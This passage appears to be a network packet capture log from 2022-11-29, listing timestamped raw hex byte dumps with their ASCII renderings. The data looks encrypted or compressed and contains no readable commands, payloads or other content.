                                  2022-11-29 15:55:22 UTC154INData Raw: 3d ce 9f 4e 29 8a d2 d1 a7 03 cd 59 f2 2f 96 85 17 f4 05 ac c3 05 3f c2 24 86 9c e8 2a 39 0e a9 97 9f f4 5f c5 67 27 8f c7 e0 8e e9 f4 02 7c 1a 89 9f 4c c4 a1 3a c5 8d 67 e5 46 f7 fc c6 58 80 8f 75 3b 50 f7 ba 53 d1 59 e6 ce 0a fe 38 c0 a3 47 92 7b 2b e4 80 d5 5c 20 ae 61 e6 74 bb d9 59 47 62 63 3b ef 43 86 44 a0 b5 a3 30 4f d9 2a 2a 2b 29 4a 31 74 1c af 12 d3 2d a9 31 e6 1e ff f6 45 eb 8b 43 5d 60 41 b8 d8 70 25 dc da de bb 2b ac 97 1a 14 8b 41 e1 65 f2 60 3d 89 fe 78 da 3b 0e f2 c7 63 94 e8 e4 95 0c e8 b4 88 b2 86 55 61 f3 9f 67 13 6e 49 c5 07 92 c3 4d d4 0d 4d 2f 18 48 fb ee 07 bd 62 18 31 fd 96 f2 d7 1b 53 67 dd 61 dd 42 5f 31 43 77 90 68 2b e4 52 1a 7c 8d 47 4d 5b 21 bb 7c 0c 71 39 31 e7 d4 82 e8 cc 51 f6 20 c7 36 19 9a 79 c0 4d 0b 3f 76 8c f1 5c eb
                                  Data Ascii: =N)Y/?$*9_g'|L:gFXu;PSY8G{+\ atYGbc;CD0O**+)J1t-1EC]`Ap%+Ae`=x;cUagnIMM/Hb1SgaB_1Cwh+R|GM[!|q91Q 6yM?v\
                                  2022-11-29 15:55:22 UTC158INData Raw: 81 11 fa 8a b2 f8 34 c5 7f c7 7b e6 b0 2a 6b b9 2f 26 d1 a4 5b 33 51 c5 ee 0b 4b 12 80 b5 64 e4 57 7b b5 48 cd 2d c7 80 7d 9f 3c 88 d9 50 c8 7c 34 5e 84 5d 4b 07 47 09 af c0 aa 3f 6a f6 e9 75 45 c2 67 4c 52 56 f0 fa 0d 9f fb 34 de aa 75 bc 8c 27 38 89 0e 6b 74 6a 2f 0b 95 ea 51 bc 39 1c ae 4a 56 69 e0 b6 26 9c 8d d4 e4 6d 7f ca de 09 ed c0 ec 0a 18 e5 e8 94 83 fb ca 5d 6c db 34 72 ff 5b 73 37 a5 3f 0a 32 c8 46 f8 2a 4d 50 f9 83 e4 8f 6a 2e b4 a7 97 49 22 59 ce 58 3a cc 78 b5 59 3b 41 30 39 c8 67 e8 77 a8 e7 85 bd e7 b3 74 79 37 d3 bb 03 61 d3 3a f2 67 c3 e8 75 16 7d cf 83 81 50 97 ba d0 ad da 4d a0 c3 ea b0 24 d0 03 8a 3e 5b 65 0e ac ed 8e e9 08 5a 73 e6 66 cc f0 8a f6 43 9a 56 ce a4 bd 78 29 7a 4c 53 e4 aa c8 d5 0d 1d 6f d1 c8 c9 cb 7b 86 68 ad 8a b1 bf
                                  Data Ascii: 4{*k/&[3QKdW{H-}<P|4^]KG?juEgLRV4u'8ktj/Q9JVi&m]l4r[s7?2F*MPj.I"YX:xY;A09gwty7a:gu}PM$>[eZsfCVx)zLSo{h
                                  2022-11-29 15:55:22 UTC161INData Raw: a8 1b fb 87 8a 20 8e ee 41 99 34 67 1c 62 d5 2f a9 60 6a 4c 61 c6 37 b7 17 23 73 cf 37 49 92 74 80 e9 32 8b 5a ad 96 19 7d ea 36 e1 86 d2 f1 0c 49 18 14 1b 1f 6b 0f f4 36 21 31 f6 e1 58 51 f6 9c 3e 31 0e 88 6f 1a c6 e6 0c 4c 6f a5 91 99 95 10 b1 fa 7f 38 97 b2 5d 00 12 3f 16 21 02 fe f5 1b f4 af 7e 82 ba a7 5b 41 3b 24 b4 6d 82 6c ca 47 61 f5 d7 31 e6 9b 36 20 7f 95 ca f7 f0 37 a0 c5 85 c5 9b 92 0b 4e b5 51 9c d9 16 44 85 13 c7 ed e6 91 33 b2 72 c9 b8 12 73 c7 5e 2f 5c 22 c7 5d f2 ad 1e 6d a5 35 ce 1c 51 99 3f 3d d3 2f 1d da e0 27 99 c7 9e 29 9f e2 2b f1 4b 6a f8 f1 ab 68 09 7d ea 7c b9 5a 04 73 ea 60 9d f9 b0 76 d1 2e c8 f6 69 68 56 d4 b0 37 02 f2 6f 73 74 43 00 fb 6f a2 5a 91 90 be 08 88 46 85 10 97 19 f8 93 55 36 7c 6f bf 02 09 a6 15 c8 ec fa f1 50 ad
                                  Data Ascii: A4gb/`jLa7#s7It2Z}6Ik6!1XQ>1oLo8]?!~[A;$mlGa16 7NQD3rs^/\"]m5Q?=/')+Kjh}|Zs`v.ihV7ostCoZFU6|oP
                                  2022-11-29 15:55:22 UTC165INData Raw: ad 49 29 25 08 bd 77 2e 87 25 36 aa 9e a5 b9 3f 46 1e df 17 c6 a4 f1 88 b6 9e 0f 6c 6f 23 1a 1c bd ea 6b bc 86 68 03 b3 56 78 8e b0 ff 76 fb ec 4f c6 0c b9 b6 a9 6b 61 36 c4 9c b6 a7 b9 e8 a3 d0 0a ed 99 3e e7 b5 e7 ba ee 79 4a 54 a7 49 66 3b 4f ea 1c 16 5e 0e 0b d0 9b f2 1e d5 0b 0d f1 12 cc bc 38 fb f2 f0 b4 19 89 8e fc 5e 16 04 05 63 3d 7f 5b 20 ce cf 1c f8 00 bb 6c f5 f2 3f 36 3e df 54 02 7d 2b c1 12 00 e9 e0 0c 32 49 31 3b fd 84 a6 4e 93 0b c9 1a d3 5a aa 2a 7a e5 8d 57 19 8c 35 ae 65 75 47 7e 5e bc fc 7e d5 3a c4 02 84 60 7c 41 83 d9 e5 99 41 98 9c a0 12 2b f9 50 c1 e3 f5 36 27 bb 6d 08 89 10 91 cf 44 5c b8 ed ac fe 87 f8 4c 38 03 b7 a8 6b 8e 2e c9 c0 e0 ec 8a e5 a0 2f d3 a0 32 82 47 ad 91 67 2e 33 a9 f9 95 bc 27 6a 6c 2a 7d a9 13 12 ff b5 fd ed d8
                                  Data Ascii: I)%w.%6?Flo#khVxvOka6>yJTIf;O^8^c=[ l?6>T}+2I1;NZ*zW5euG~^~:`|AA+P6'mD\L8k./2Gg.3'jl*}
                                  2022-11-29 15:55:22 UTC170INData Raw: 66 28 2c ea 62 ab cd d8 a6 24 d8 f2 1a 7d 45 b4 7c 88 ce 3c 60 fc bc 24 2a 50 fe 8c 02 d1 a9 b0 24 8c 87 5c 27 e1 a5 b7 31 a7 13 f0 82 48 90 23 41 44 96 e6 14 df 08 a8 37 b6 50 8c f1 3e 3c bb 62 b6 4d aa 6d de 6b 26 d9 53 1e f9 b6 0c 90 43 22 d3 65 84 1b fe 81 03 6a be 40 bd 86 81 cc e1 04 bf b4 33 83 2b 88 4a ea f9 4c 71 97 c4 06 06 ec 7b 39 84 b7 dd 60 d9 da e3 03 9a f2 b5 e6 66 b4 e6 33 aa bc 50 f5 e9 74 aa 59 6f d5 92 77 60 49 bc 7d 6d e5 51 6b 69 9c e5 7f 6b ee 78 b7 0d 44 62 98 32 8d ef c5 06 7f e3 40 c9 ae 4b 28 2c 27 77 03 0b 0d 46 80 6f 86 af 6a 89 23 04 ce a1 3d bc 2e 48 52 9b 78 05 67 37 db 73 e3 57 46 aa f2 f6 9b 4e 12 28 b7 63 4f 89 d0 0e f3 e2 b4 de 19 8b 91 c1 10 7e 0b ea 50 48 b3 b8 aa 9b 48 9e 8b 12 22 09 f3 85 a1 52 01 ad 0e 71 16 18 3f
                                  Data Ascii: f(,b$}E|<`$*P$\'1H#AD7P><bMmk&SC"ej@3+JLq{9`f3PtYow`I}mQkikxDb2@K(,'wFoj#=.HRxg7sWFN(cO~PHH"Rq?
                                  2022-11-29 15:55:22 UTC174INData Raw: 92 d5 38 cf d9 50 fc 3e cf 97 b2 2e 3a 3b 2b 79 a5 a5 23 b8 d2 6b 04 86 83 b7 97 58 29 f3 9c a8 29 2f 5e d2 25 a6 b4 47 00 35 c1 d1 ef 09 56 e3 93 c0 c4 c6 7c 1c fb cf 4b fc bf 8e 9e e1 43 4a 3b 50 99 55 2f 9b d2 c2 4e 1e b7 0b 51 cb ea 89 0e 77 f3 86 58 8f 34 99 3a 35 8b 17 39 ae 49 e5 8f 78 7d bc e4 19 82 c4 67 9f 8e 84 f2 40 2d 54 b0 2c 2b 00 7e 4f cb ab 20 82 3b 12 f3 af 3b fd 44 e0 74 75 e8 aa bd 38 19 e4 14 ba cc 54 ea 5f c9 ed 4d 6c 08 7b a4 fa 85 ab 6f 24 3e 1a 33 1f 56 5b ce 20 c0 7a f2 4a 21 da 01 6b f0 7c 5a 41 be 92 2f ea f5 e4 20 8e 5d 86 49 54 32 3b 65 74 3f c4 81 f7 9f 52 fb b2 6b 01 78 9d 70 59 79 cc 4a 81 a8 03 4a 8b 37 e7 72 60 62 f1 06 1d 53 a0 56 a0 f7 ef f8 a6 4a 16 c5 d0 f6 ca cd 4e 7c f8 38 8d ca 02 c6 58 50 65 7a 8b 1c 60 f4 25 e2
                                  Data Ascii: 8P>.:;+y#kX))/^%G5V|KCJ;PU/NQwX4:59Ix}g@-T,+~O ;;Dtu8T_Ml{o$>3V[ zJ!k|ZA/ ]IT2;et?RkxpYyJJ7r`bSVJN|8XPez`%
                                  2022-11-29 15:55:22 UTC178INData Raw: ac 44 1e ba 9a e5 23 47 75 53 d8 86 87 bb 63 65 ec 5f c8 35 63 08 8f 46 91 73 b5 b9 9c 54 5d 5e 7d 90 e9 b1 81 fd 1f 8e 6d dd f9 34 f4 cc c4 59 73 84 4e 74 4c 33 df 06 5c c6 24 00 2c 01 2f 6d 99 1c 1d 5a eb 9c 95 e1 72 2b 6f 1b 87 12 2d a7 2b c7 d7 e9 0c c3 62 bc 34 72 f9 44 c8 6c 1e 56 23 70 48 c1 16 3f c0 49 4d 02 09 de 59 a8 b8 46 a8 02 f1 8c 0d 76 e3 bb ad b4 f5 e8 31 fb 31 09 7e e0 69 6f 6a 06 a5 1d 84 6c 89 b5 fc c9 59 c4 0c 0e 7f 46 ef 93 0b 58 92 d3 74 23 fb 37 6d 73 8e 37 49 3b 5d 00 e5 b7 d4 41 48 a1 a6 19 d2 2d 96 7c 8b f1 cf 5b 04 e1 ee 2c 38 24 a5 fe 35 d3 57 ad cf 76 c1 2a f9 26 af 6b 06 f3 2c 00 73 7b 2e a6 ca 98 0a e6 30 26 33 af c2 a6 78 b7 00 a1 41 81 f7 ec 3a de 5a c3 e0 a9 43 b7 c8 f5 e7 bd 3b c1 5c d7 56 c0 58 54 31 5d fc 62 14 a0 3a
                                  Data Ascii: D#GuSce_5cFsT]^}m4YsNtL3\$,/mZr+o-+b4rDlV#pH?IMYFv11~iojlYFXt#7ms7I;]AH-|[,8$5Wv*&k,s{.0&3xA:ZC;\VXT1]b:
                                  2022-11-29 15:55:22 UTC182INData Raw: ae 85 0b be 42 18 03 16 6c 6c 74 c8 54 8e 3d b2 71 4d 28 ab 92 28 3a b8 4b 2b d2 91 84 72 4a 55 03 ff 3a 0f 5c b7 14 45 6a b0 d1 0e 40 2c 80 8e 93 98 20 52 ff 33 dc a6 3b a3 a6 d0 be c3 a5 c7 f0 dc 7c ed a1 a0 24 9d a1 ab 68 64 47 bd 8b 19 55 aa 83 fd 7d 3c 37 d5 55 8b 09 63 55 ac 19 0c 6b 4f df 30 0d c5 46 e7 15 b4 41 c4 5c 79 ed 4a 37 2f 19 71 fb 65 8b cd 76 9a 30 1b a3 d0 9f da 63 00 25 3a ef e5 43 e3 47 95 bf 66 2c 4d 22 81 dc 4b 1c 72 f5 4e 9f df c2 f2 0e 13 92 f8 34 2e b2 33 8d 56 96 61 30 ff 9b f0 05 20 74 a4 3a c7 34 2f ba ee e5 12 53 48 1e 4c 86 e5 e9 9a fa 25 77 91 21 2f 5f c6 3b 19 57 30 d2 26 f8 a3 7b 12 3b 05 1b 63 51 ff c7 ef 5d 55 c1 eb 33 95 99 e1 5d 80 51 19 6c 76 80 9b 45 49 67 79 76 b0 51 b8 08 9f a1 8f 34 16 54 4c ad 12 e6 ae b5 71 b0
                                  Data Ascii: BlltT=qM((:K+rJU:\Ej@, R3;|$hdGU}<7UcUkO0FA\yJ7/qev0c%:CGf,M"KrN4.3Va0 t:4/SHL%w!/_;W0&{;cQ]U3]QlvEIgyvQ4TLq
                                  2022-11-29 15:55:22 UTC186INData Raw: df 01 19 18 8a 0a 8c 44 c3 f9 42 59 e1 d2 d6 ff cf b2 70 73 f2 5e e2 45 08 12 a4 4c 53 2b ba 1a c5 fd 02 49 2b 10 26 56 43 9e 32 a3 55 64 d2 1f f6 2b 99 53 11 ce 70 0c b8 a0 ae 04 01 a6 85 e9 5b 67 d4 30 e9 38 9d 78 40 e3 f1 b5 cb a6 1a d0 80 01 5a 33 e5 59 36 d6 2b dd da 8e b1 5c 40 3a 2e 76 15 bd 41 95 05 72 48 86 18 69 3b 6d e2 f5 20 82 84 5d 14 ef 8c 58 74 5d 6b 21 6d 3e 84 12 37 84 17 9f 34 97 ed a2 95 66 7e 9d 81 a7 9f 6b cf f5 d5 b5 5b da 76 21 cd 5a 78 7f 59 94 4f 77 ce 03 d2 9e 66 71 46 da 5e 11 59 65 16 c4 36 5e cc db 9d 65 09 2f 96 ff 88 9f 36 25 a6 ff 2a 39 cc 2f 7a 98 4d 89 8c 3e 2d 99 07 c1 fe 94 ec 30 e8 28 23 c8 65 21 94 d5 21 ef 09 81 25 03 24 f4 8b 20 ec 30 2c 0b 00 ad 00 f8 c4 06 56 00 fc a8 eb 01 e2 72 08 67 12 5b 99 03 bd eb f1 2d 24
                                  Data Ascii: DBYps^ELS+I+&VC2Ud+Sp[g08x@Z3Y6+\@:.vArHi;m ]Xt]k!m>74f~k[v!ZxYOwfqF^Ye6^e/6%*9/zM>-0(#e!!%$ 0,Vrg[-$
                                  2022-11-29 15:55:22 UTC190INData Raw: 24 1b a2 a9 61 09 89 c0 43 0d e1 d4 d1 82 27 35 cd 01 ee c6 12 a1 71 99 9d 85 a6 75 ac 3c 19 fa 63 3b 6b 20 69 d4 fb a3 72 fa 6c 68 d1 eb 7b c7 e8 54 8e 0e 1b 1c b4 08 05 84 d5 52 76 02 eb 7f 1f fd b2 bb de 0e d3 c2 10 1a c3 5e 80 25 01 f8 d8 ca 5c 03 6f ed 24 44 49 c9 46 b3 cb 9b ec 0b c1 5a d1 cb 8e f9 90 d0 13 1c 7e 47 bc ee 60 8a 59 da b8 61 b8 af 2d 53 ba b9 8a cf f8 1b a4 9e 2e c1 0f 62 11 61 7f 2f 6a 6f d9 a7 0b 64 0a 58 c9 54 57 d1 06 bf ef 80 25 ac 3e fe 81 86 05 7c d8 cf d7 0d 00 ac 81 9a 02 d7 a0 93 f6 a8 fc 7b 4d 33 15 63 6c f3 8e b3 3d e7 73 b3 7d da ac 42 00 25 13 01 e1 2f 8e 75 ff 93 4a af 1c 09 f7 59 6a d2 3c 1e 33 3e cc da 49 72 35 4c 0e 2b b1 7d d8 25 be 69 78 cd 13 67 19 1e ca cb f4 90 36 60 99 12 09 c2 0c 06 fa 69 d4 3b 85 de b8 f8 32
                                  Data Ascii: $aC'5qu<c;k irlh{TRv^%\o$DIFZ~G`Ya-S.ba/jodXTW%>|{M3cl=s}B%/uJYj<3>Ir5L+}%ixg6`i;2
                                  2022-11-29 15:55:22 UTC193INData Raw: d0 a2 c7 cc a3 29 09 26 d0 27 da d5 92 22 10 79 80 38 6b b7 ba 4c 8a 07 b5 97 41 e5 46 54 7a 4f 93 52 84 af 0b 55 4b 94 b8 5f ca e3 41 09 19 08 a0 5c 74 d5 96 fd f1 64 d3 ae d6 c4 29 0c 5c ea 55 e3 2c 53 b5 89 a1 b9 28 12 9b 13 b3 26 e9 6c 49 d0 57 35 ce 1c 7c 9f 6a 59 69 dc df 52 55 89 e9 27 1d 9c 7b de 00 98 3e af 9d bb 48 3a 6d fc 0a 94 83 ee 2e d1 db 6f fa 37 02 08 51 42 d9 81 9b fe 33 37 1c be cc 8a 5b ec fe e2 f5 52 5a d1 e0 75 85 e8 88 bf 3e 75 8f a3 af 7c 10 f9 e9 5b be 30 3f 6e fb fb b4 52 e5 5a b7 1b 31 9f ca 36 a6 b5 22 ee ae 37 99 5f d8 10 28 8c f8 34 f7 2f 6d 5b 51 9f ff b2 0f d7 43 1d 4a 0d c4 13 b5 b0 85 00 e4 8c f0 91 35 cb 6d 01 e1 f8 e5 f2 e1 28 88 25 24 7b de 8f 59 de 9c ce 27 35 6e 69 9e a6 c2 19 67 cc 72 32 02 73 b9 64 0d f2 5f 8b cb
                                  Data Ascii: )&'"y8kLAFTzORUK_A\td)\U,S(&lIW5|jYiRU'{>H:m.o7QB37[RZu>u|[0?nRZ16"7_(4/m[QCJ5m(%${Y'5nigr2sd_
                                  2022-11-29 15:55:22 UTC197INData Raw: 94 9e 06 10 57 b6 5d 2e 9e 35 16 48 ee 12 74 b5 ef ff 2f a3 2a 9b b8 9d 48 59 f5 9b ab f2 2d 7f de d1 ea 7b dc cd 0e de e3 55 45 de d9 53 9b c8 a9 93 8e 78 ce c5 15 66 ec c8 6e 54 9f 20 32 a8 cf 34 40 d1 b3 1c 70 cb 0d 9e c3 de 44 54 0a ce 69 5a 74 07 40 18 b1 5d 98 8e de 2e bf af c8 ab 99 d0 f5 fb fd 54 91 8f 27 12 be e6 38 4a bf 22 78 9d 34 7a 27 e5 02 fa 6a c8 a1 d1 d4 6b e6 de 23 b4 3b 12 de fd d3 19 07 ec 10 54 24 f2 ea 32 69 5c 30 c0 34 c9 0a 8b b3 b5 06 fe 2b 36 3f 60 42 6e 70 b6 ec 10 fe b9 7c e8 64 82 21 af b9 3b d9 cf 6b 24 ee e0 91 cc a8 ec b7 5a 6c 33 f4 a2 27 fa 65 67 32 81 47 bb f6 49 04 fa 87 9c ee f5 13 c9 05 f3 74 84 9e d3 f5 96 ce 1a 67 83 b5 99 e7 bb 54 f3 6f e1 85 1b 82 6a 5f b3 7d 6b 7d 44 c0 83 5d 81 75 21 4a 11 7d ad 86 ac 02 11 f0
                                  Data Ascii: W].5Ht/*HY-{UESxfnT 24@pDTiZt@].T'8J"x4z'jk#;T$2i\04+6?`Bnp|d!;k$Zl3'eg2GItgToj_}k}D]u!J}
                                  2022-11-29 15:55:22 UTC202INData Raw: 16 4f bb f6 ab 4d 2b 65 4c a3 6f 6b a5 c6 a3 f1 a3 52 3e 31 15 2b 6b 40 e4 2d fe a6 0e 9d 46 90 61 76 01 67 a4 38 dd 5e cf 7a 6d 86 f1 65 f8 ca 49 44 ae b1 f4 dc c0 6d 83 9e bf 51 4b 3e 1c 50 6c c9 93 8f fb 6c 8f c5 b6 9f 42 6c e8 6e 2b 46 6b fd 86 f8 86 e4 44 8f 0f 8f 96 01 e2 07 6f 34 e9 5d 12 77 80 30 54 e3 ae 11 74 be 16 7d 48 5b 7b d6 7e d8 70 57 6a 68 9e 3a 8e 9e 80 d8 45 d2 a6 e3 1c d7 94 cb 3f b8 28 ad 71 4c bd 71 48 f8 bd 74 52 fb 4e 53 55 ae 59 3f e6 9c 2c b4 08 fa 99 41 4b a9 00 10 16 d8 29 7f 91 39 16 24 0f c2 97 43 a3 28 1f 67 e9 e7 f8 c9 5d ec d8 54 98 e8 1c 17 40 f8 6a a4 cf 25 64 1e 6a 56 bf db d2 e0 73 9a ad 34 e3 29 53 3a 27 2d 78 4f 9a 41 bb 5f bb e6 85 cb 17 c7 01 a5 b3 a6 ef d4 ab 38 f1 e8 e9 25 82 45 41 7c 2f f2 16 31 3c d1 b5 8b 15
                                  Data Ascii: OM+eLokR>1+k@-Favg8^zmeIDmQK>PllBln+FkDo4]w0Tt}H[{~pWjh:E?(qLqHtRNSUY?,AK)9$C(g]T@j%djVs4)S:'-xOA_8%EA|/1<
                                  2022-11-29 15:55:23 UTC206INData Raw: 30 20 72 79 1e 76 b9 73 67 47 2b 70 59 bb 2d 01 65 f2 67 ca 80 0b 42 de 51 d2 44 95 a7 9a 80 9f 7e 08 ea 34 a6 76 95 15 24 4a 71 e2 7e c9 ef b2 c5 9b 6b d8 c7 04 34 da e2 49 d5 2b 99 7d a5 1c 94 54 b9 09 35 4a 34 2b 15 98 ce 4c 8c 4f 76 ae 01 95 e1 b3 f4 f5 bb a0 e5 12 d0 c0 60 3d 6c 3c 02 76 2c 57 c8 cc 57 d2 c4 8f 84 cc 6b 64 a4 cb 3b 3d 38 94 7f b1 ed 16 20 fa 81 40 f3 0d 32 91 83 92 a9 e3 2b c0 a9 a8 9d c0 ba e4 f9 3f a2 bf 6c 9b c4 c0 d6 b1 c5 0e 49 48 73 8e 67 62 11 a4 59 40 83 c5 56 59 ac 91 03 ed 91 f4 93 b5 ac 8c 84 a5 43 ba 65 91 ba 0f e8 9f d3 57 fc 40 05 c6 51 64 fe bb 3f f2 7e f7 f1 a0 66 e0 9d 3b 78 ac 7d 65 fe 9b 70 a5 39 f6 10 39 8f 36 82 17 f4 31 74 85 fb ef 83 47 12 11 7f 01 0a 0a 9f fc 25 1c cc e7 21 7c cf 14 b4 89 9b 26 34 78 2d 88 fb
                                  Data Ascii: 0 ryvsgG+pY-egBQD~4v$Jq~k4I+}T5J4+LOv`=l<v,WWkd;=8 @2+?lIHsgbY@VYCeW@Qd?~f;x}ep9961tG%!|&4x-
                                  2022-11-29 15:55:23 UTC210INData Raw: b6 7d 58 22 76 b5 96 7f 75 03 2e 97 b0 23 67 fc c6 65 cd c7 77 ce 98 ed e2 f9 7e 7f b2 85 5b e9 82 15 8d 4e 8f 35 bd 75 be e1 bd a3 fe de 46 6f 68 0c f3 fc a0 13 c3 ad e7 06 f2 9f 68 f1 5a ec d5 8f d8 b1 b7 93 cc 57 60 59 b5 08 06 0d e1 a0 fb 8d 4b 6e e5 8e 99 6d 41 30 3a b4 c5 6c 4e 16 5a d5 a9 5b 74 1d 99 b1 34 cd b8 13 f7 9d 66 a9 c2 22 5a 88 59 d9 65 80 48 81 e3 ee 34 e5 cb 8f 80 41 60 a4 0a 0b 76 cd 97 d0 6d a6 e7 ad 2c 4d 30 24 d4 2a 20 ae 05 f6 4f c9 7a 1e 87 9d 4f a8 6e c3 7a d2 56 11 bd 8f 6a 46 df 8a eb 24 7b a2 fd 68 ca 1d 67 76 ad 5d d4 7f 98 e1 02 41 6e de 6f a2 7f a9 df f2 03 94 5e fd 3c 6a 8d 36 d8 5e 0c e5 fd 9c ba 0d 67 47 d2 b9 98 74 28 ea 34 16 f8 f0 37 7c bf 26 0c 19 da 0a d0 9f ea fa 23 ce 0e d2 c5 1d 84 aa d7 d8 97 02 50 ea 14 f4 d2
                                  Data Ascii: }X"vu.#gew~[N5uFohhZW`YKnmA0:lNZ[t4f"ZYeH4A`vm,M0$* OzOnzVjF${hgv]Ano^<j6^gGt(47|&#P
                                  2022-11-29 15:55:23 UTC214INData Raw: 7c a2 74 68 ac 7e 90 17 bd 18 e2 71 c8 5f 75 69 f1 b3 91 a3 1c 21 af 77 82 20 80 0c 27 4f 9c 35 97 1a a5 e3 12 df c7 f5 07 11 68 ea 11 ba d4 5a 49 e9 2b af 3c 41 92 a2 e2 d6 15 60 5c 45 07 89 6b b9 e6 f4 90 df 1e f4 ad 89 36 1c b1 6e 1e fc ed f7 63 b4 86 34 be c1 ab 0e a0 52 19 88 02 a7 8e f4 6a 50 5e 36 42 8e 01 70 ce 1e 2a 35 ca e1 4d 10 b8 37 c7 91 b7 89 b7 4a bf 30 28 a2 ac 5e 65 1c e3 89 5e 4a 67 63 17 e4 2f d2 86 20 a2 b4 35 b2 6a f6 99 04 77 0b fe 95 0a c0 4e 56 32 c9 81 d4 f8 c1 dc ca 16 8b db c9 2d ba 35 c4 e3 1d 18 70 ff fc 75 4e 1b 76 95 c1 d2 aa 29 4a aa 65 dc 16 1d 60 c1 60 22 66 b6 58 47 6d eb 13 9d e5 c4 1b 02 07 24 6d 1e f2 16 65 2a 57 c0 a4 2c 2a ae 1b 89 69 be 76 2f 86 8d 31 e9 75 3a e7 73 26 00 9c f4 4c d1 f1 e9 ce 90 df cd 0d 0b 16 63
                                  Data Ascii: |th~q_ui!w 'O5hZI+<A`\Ek6nc4RjP^6Bp*5M7J0(^e^Jgc/ 5jwNV2-5puNv)Je``"fXGm$me*W,*iv/1u:s&Lc
                                  2022-11-29 15:55:23 UTC225INData Raw: 14 e7 1a 9b f1 a7 e0 52 0d 3b 5b 5e 8f 31 98 37 bf 6c 31 af 27 2e fa 8b d1 38 43 c8 31 47 16 07 97 77 00 73 73 dd dd cb bc 82 42 90 67 96 78 f7 e7 54 ec 42 01 c0 3b a6 db c0 ba 6d bc e4 f3 33 5f e3 bf d5 12 b9 a2 fe be 5e 60 51 3b 87 da ee 88 98 74 70 2a c3 e6 74 67 e3 31 26 28 a7 49 0b 04 ef 59 db b9 4c 09 85 42 94 1b 1f b2 a7 73 27 3a 04 af b5 f7 19 f9 19 06 48 2e e0 c7 f3 a6 62 84 86 62 67 18 4c 8f 74 a4 17 2d 22 7a ab ed ac a0 d7 e7 64 cf 12 b7 6c 68 a4 41 ec 9f db 3e f5 15 bf 51 89 19 99 83 2f 06 09 55 83 dd 31 24 2a 47 87 45 73 55 ee 48 a0 0d 20 c7 18 d2 51 87 be 16 bf 4f a8 3c 21 f4 5c ce 53 e5 12 12 a4 69 e7 61 de 51 0f 02 8d 9d a9 f9 6f bd 5c 31 11 00 59 1d d2 68 d9 26 0d 67 4b 31 3b 64 ed ed 4f 4b 94 39 85 0a 58 35 bb 60 a3 80 78 d5 a5 13 f2 8e
                                  Data Ascii: R;[^17l1'.8C1GwssBgxTB;m3_^`Q;tp*tg1&(IYLBs':H.bbgLt-"zdlhA>Q/U1$*GEsUH QO<!\SiaQo\1Yh&gK1;dOK9X5`x
                                  2022-11-29 15:55:23 UTC241INData Raw: 8c b6 4f 20 8d cf 47 8e 97 76 6c c8 a8 85 73 0e 01 1d bc 8b 22 ec 0f bd b7 73 68 5f 01 b5 c8 cd 9c e9 54 5e b9 72 6a 17 4c 34 59 a4 c1 d3 fc 95 f8 cb 90 d6 5b d9 b2 a4 e4 07 bc 05 a8 0b 64 69 95 d1 e9 8f f4 67 28 89 bd c3 03 99 53 e1 e1 a9 31 b2 e5 8a 80 e6 77 16 f4 be 71 54 92 53 f1 ba b2 51 e0 6f 03 98 bb f0 54 5b b3 2b 6d e5 50 a8 e0 c1 92 b5 de 82 fa 7e a7 db 27 e3 70 4c 34 fd eb 9f 71 7f d1 b7 d8 d7 5d a5 9c 7a c9 c0 5c ac 7d d9 0e c6 e1 86 a4 69 9e 83 31 ed 17 2c 77 ba 52 4e 85 c8 4e 54 5c 75 6c 0a e6 38 1f a9 ca 5c fb a7 ef 57 26 a7 cf e0 fd 69 09 12 bd a5 e8 b4 d6 94 d7 4a 3b 80 76 3f a2 71 88 e3 0f 7b a6 24 61 8f 35 89 4f ca 02 70 23 69 4a c8 d5 a2 4d 59 96 09 26 80 68 d1 6e 95 1d 38 9d d0 e6 b3 93 08 e7 84 56 e0 2e 71 6b f9 c1 0f db 19 f1 e2 69
                                  Data Ascii: O Gvls"sh_T^rjL4Y[dig(S1wqTSQoT[+mP~'pL4q]z\}i1,wRNNT\ul8\W&iJ;v?q{$a5Op#iJMY&hn8V.qki
                                  2022-11-29 15:55:23 UTC257INData Raw: 75 91 e9 38 82 2c 5a 24 7a a1 ef 92 d8 d9 91 27 ba 9d 0b 90 97 d1 d5 db 89 ff d8 28 0f c3 91 9c bd 17 64 81 dc fa 80 2e 22 6f 77 1a 7d 17 94 39 15 39 10 f1 01 f7 cf 1d dd 07 80 c1 85 a9 23 70 63 7f 64 3c 8b d8 20 d1 08 00 70 3d 19 fa bb 39 63 f6 c3 24 59 ee cd 1e 30 36 42 17 45 5d 35 a3 d0 93 ca 09 0e ca f3 8c cf 0f ff 4a eb 16 71 25 6e 41 cb 0c b2 0f 15 78 e8 f9 61 35 ce 65 d8 ec 7c 13 74 ed 4b 4b 7c 28 07 40 ad b2 85 8f 36 f1 50 7b 41 d6 42 f1 df 5a bd 4c a0 94 17 1b d5 30 53 9d b3 de 77 af 71 a2 ec 94 69 8a 08 04 53 1e 6d 78 91 a4 83 b3 e5 2e a2 b0 45 33 f5 2c ef 75 54 a6 5a 0e 72 fb c9 36 63 40 ee 38 b3 72 36 ef f7 61 01 76 d5 60 e5 18 04 69 77 3a 44 2e dd 33 c1 f7 ab da e3 7e cb 8b 80 c7 82 b9 50 2b 52 70 ab 5f d1 de 5a 05 cf 71 ce 0a 25 df 55 d9 a2
                                  Data Ascii: u8,Z$z'(d."ow}99#pcd< p=9c$Y06BE]5Jq%nAxa5e|tKK|(@6P{ABZL0SwqiSmx.E3,uTZr6c@8r6av`iw:D.3~P+Rp_Zq%U
                                  2022-11-29 15:55:23 UTC273INData Raw: 54 eb 92 d5 c1 88 ed f2 85 db fe d4 75 73 67 37 d0 af f5 18 ef 1f a3 2f 7e b5 93 7e ad 19 36 58 b8 f8 54 9c 8e d7 ac f7 c6 f7 27 4b 8c 26 a7 f0 e0 ef 22 d9 62 15 a9 cc 4f c0 31 08 79 a5 54 92 9f 30 76 12 4a bb 04 97 c0 8d f3 15 d7 3d e8 f7 e0 ff 78 e5 ca 1d 73 f9 e2 d0 4f 92 05 9a f2 66 9e d9 90 7d 58 3b 20 5b b3 fa 1b 61 b3 60 c4 b0 f4 cd 88 33 f7 8d e9 78 29 2c 58 9c 1c c4 59 13 c0 c0 76 2f 72 8c 72 fd f4 eb 6c 07 d1 82 30 48 65 1d db 91 5d 13 d6 bf 6f a1 3b 57 6b b1 bb 49 e2 88 48 c3 03 fe 64 58 c3 2d ea 2e b4 da 9e 90 ef cb 32 72 8c 4b 59 39 73 03 bd 0a 8b e8 8c 6d 3f 56 15 59 b3 ba 37 f8 1b 5c 73 bc 56 c3 6a a9 22 87 63 0c e1 a2 f3 ab c7 15 47 c4 ca 08 50 15 